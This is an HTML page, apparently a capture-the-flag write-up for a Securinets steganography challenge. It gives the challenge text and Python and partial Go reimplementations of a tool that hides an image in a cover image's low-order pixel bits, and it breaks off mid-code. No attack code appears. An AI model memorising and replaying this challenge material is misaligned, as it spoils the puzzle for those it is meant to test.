&lt;h3 id=&#34;description-2&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#description-2&#34;&gt;#&lt;/a&gt; Description:&lt;/h3&gt;
&lt;blockquote Secrect=&#34;&#34;&gt;
&lt;p&gt;My friend write a tool that can hide data inside an image. He give me this tool with an anime video without any source code and challenge me to get the secret! . Can you help me extract the flag?&lt;br&gt;
Flag format: Securinets&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;In this Challenge you will get a go binary and a video! I will not explain how to reverse the binary. The main Idea is to understand what the binary do and extract the data from the video&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Author: &lt;strong&gt;Raf²&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Binary: &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9naXRodWIuY29tLzRuNm5rOHMvcXVhbHMtMjAyMy13cml0ZS11cHMvcmF3L21haW4vUmFmLUhpZGUvcmFmaGlkZQ==&#34;&gt;Download&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This is a python version of what the binary can do :&lt;/p&gt;
&lt;figure class=&#34;highlight python&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;31&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;32&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;33&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;34&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;35&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;36&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;37&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;38&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;39&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;40&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;41&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;42&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;43&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;44&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;45&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;46&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;from&lt;/span&gt; PIL &lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; Image&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; argparse&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;comment&#34;&gt;# Create an ArgumentParser object&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;parser = argparse.ArgumentParser(description=&lt;span class=&#34;string&#34;&gt;&amp;#x27;Example program using options and arguments&amp;#x27;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;comment&#34;&gt;# Add options and arguments&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;parser.add_argument(&lt;span class=&#34;string&#34;&gt;&amp;#x27;-i&amp;#x27;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&amp;#x27;--input&amp;#x27;&lt;/span&gt;, &lt;span class=&#34;built_in&#34;&gt;help&lt;/span&gt;=&lt;span class=&#34;string&#34;&gt;&amp;#x27;select cover-image&amp;#x27;&lt;/span&gt;, &lt;span class=&#34;built_in&#34;&gt;type&lt;/span&gt;=&lt;span class=&#34;built_in&#34;&gt;str&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;parser.add_argument(&lt;span class=&#34;string&#34;&gt;&amp;#x27;-e&amp;#x27;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&amp;#x27;--embedfile&amp;#x27;&lt;/span&gt;, &lt;span class=&#34;built_in&#34;&gt;help&lt;/span&gt;=&lt;span class=&#34;string&#34;&gt;&amp;#x27;select image to be embedded&amp;#x27;&lt;/span&gt;, &lt;span class=&#34;built_in&#34;&gt;type&lt;/span&gt;=&lt;span class=&#34;built_in&#34;&gt;str&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;parser.add_argument(&lt;span class=&#34;string&#34;&gt;&amp;#x27;-o&amp;#x27;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&amp;#x27;--output&amp;#x27;&lt;/span&gt;, &lt;span class=&#34;built_in&#34;&gt;help&lt;/span&gt;=&lt;span class=&#34;string&#34;&gt;&amp;#x27;The output&amp;#x27;&lt;/span&gt;, &lt;span class=&#34;built_in&#34;&gt;type&lt;/span&gt;=&lt;span class=&#34;built_in&#34;&gt;str&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;comment&#34;&gt;# Parse the arguments&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;args = parser.parse_args()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;comment&#34;&gt;# Check if the options and arguments are correct&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; args.&lt;span class=&#34;built_in&#34;&gt;input&lt;/span&gt; &lt;span class=&#34;keyword&#34;&gt;and&lt;/span&gt; args.embedfile &lt;span class=&#34;keyword&#34;&gt;and&lt;/span&gt; args.output:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;built_in&#34;&gt;print&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&amp;#x27;Starting Hiding ...&amp;#x27;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;else&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;# Provide an usage message if the input is incorrect&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    parser.print_usage()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    exit()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;image=Image.&lt;span class=&#34;built_in&#34;&gt;open&lt;/span&gt;(args.&lt;span class=&#34;built_in&#34;&gt;input&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;embed=Image.&lt;span class=&#34;built_in&#34;&gt;open&lt;/span&gt;(args.embedfile).convert(&lt;span class=&#34;string&#34;&gt;&amp;#x27;1&amp;#x27;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; image.size != embed.size:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;built_in&#34;&gt;print&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&amp;#x27;The Images are not in the same size!&amp;#x27;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    exit()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;embed_data=embed.load()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;image_data=image.load()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;index=&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; j &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(image.height):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(image.width):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        flag_pix=&lt;span class=&#34;built_in&#34;&gt;int&lt;/span&gt;(embed_data[i,j])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        flag_pix &amp;amp;=&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        im_pix=&lt;span class=&#34;built_in&#34;&gt;list&lt;/span&gt;(image_data[i,j])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        data = ((flag_pix &amp;lt;&amp;lt; index%&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;) | (&lt;span class=&#34;number&#34;&gt;254&lt;/span&gt;-index%&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;)) &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; flag_pix ==&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt; :&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            im_pix[index%&lt;span class=&#34;number&#34;&gt;3&lt;/span&gt;]|= data &amp;amp; (&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;+index%&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;keyword&#34;&gt;else&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            im_pix[index%&lt;span class=&#34;number&#34;&gt;3&lt;/span&gt;]&amp;amp;= data&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        image_data[i,j]=&lt;span class=&#34;built_in&#34;&gt;tuple&lt;/span&gt;(im_pix)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        index+=&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;image.save(args.output)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;This is a golang version of what the binary can do :&lt;/p&gt;
&lt;figure class=&#34;highlight go&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;31&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;32&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;33&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;34&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;35&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;36&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;37&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;38&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;39&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;40&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;41&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;42&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;43&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;44&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;45&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;46&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;47&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;48&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;49&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;50&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;51&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;52&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;53&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;54&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;55&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;56&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;57&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;58&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;59&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;60&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;61&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;62&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;63&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;64&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;65&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;66&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;67&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;68&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;69&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;70&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;71&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;72&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;73&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;74&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;75&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;76&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;77&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;78&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;79&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;80&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;81&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;82&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;83&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;84&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;85&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;86&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;87&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;88&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;89&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;90&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;91&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;92&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;93&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;94&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;95&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;96&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;97&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;98&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;99&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;100&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;101&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;102&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;103&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;104&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;105&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;106&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;107&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;108&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;109&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;110&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;111&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;112&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;113&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;114&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;115&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;116&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;117&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;118&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;119&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;120&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;121&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;122&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;123&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;124&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;125&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;126&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;127&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;128&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;129&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;package&lt;/span&gt; main&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; (&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;string&#34;&gt;&amp;quot;fmt&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;string&#34;&gt;&amp;quot;image&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;string&#34;&gt;&amp;quot;image/color&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;string&#34;&gt;&amp;quot;image/png&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;string&#34;&gt;&amp;quot;os&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;string&#34;&gt;&amp;quot;flag&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;function&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;func&lt;/span&gt; &lt;span class=&#34;title&#34;&gt;main&lt;/span&gt;&lt;span class=&#34;params&#34;&gt;()&lt;/span&gt;&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Create a new FlagSet to parse command line arguments&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	flagSet := flag.NewFlagSet(&lt;span class=&#34;string&#34;&gt;&amp;quot;steganography&amp;quot;&lt;/span&gt;, flag.ExitOnError)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Define command line options and arguments&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	inputFileName := flagSet.String(&lt;span class=&#34;string&#34;&gt;&amp;quot;i&amp;quot;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&amp;quot;&amp;quot;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&amp;quot;select cover-image&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	embedFileName := flagSet.String(&lt;span class=&#34;string&#34;&gt;&amp;quot;e&amp;quot;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&amp;quot;&amp;quot;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&amp;quot;select image to be embedded&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	outputFileName := flagSet.String(&lt;span class=&#34;string&#34;&gt;&amp;quot;o&amp;quot;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&amp;quot;&amp;quot;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&amp;quot;The output&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Parse the command line arguments&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	flagSet.Parse(os.Args[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;:])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Check if the options and arguments are correct&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; *inputFileName == &lt;span class=&#34;string&#34;&gt;&amp;quot;&amp;quot;&lt;/span&gt; || *embedFileName == &lt;span class=&#34;string&#34;&gt;&amp;quot;&amp;quot;&lt;/span&gt; || *outputFileName == &lt;span class=&#34;string&#34;&gt;&amp;quot;&amp;quot;&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		flagSet.Usage()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		os.Exit(&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	